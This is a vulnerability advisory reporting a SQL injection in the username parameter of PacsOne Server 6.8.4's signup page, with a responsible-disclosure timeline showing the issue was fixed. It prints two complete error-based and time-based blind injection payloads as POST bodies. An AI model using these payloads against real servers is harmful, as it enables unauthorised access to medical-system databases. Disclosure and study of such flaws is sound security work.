Vulnerability
PacsOne Server 6.8.4 suffers from a SQL injection vulnerability on username parameter in the signup page.
Exploit
Allows attacker access to usersignup table in the database for pacs server
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7a6d7355 WHERE 7540=7540 AND (SELECT 2789 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(2789=2789,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7961476e WHERE 9154=9154 AND (SELECT 7374 FROM (SELECT(SLEEP(5)))nQhL))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up
Timeline
05-07-20: Submitted incident through email, immediate response
05-21-20: Issue resolved
09-10-20: New version released
09-19-20: Submitted public disclosure
Reference
Disclaimer
Content is for educational and research purposes only. Author doesn’t hold any responsibility over the misuse of the software, exploits or security findings contained herein and does not condone them whatsoever.

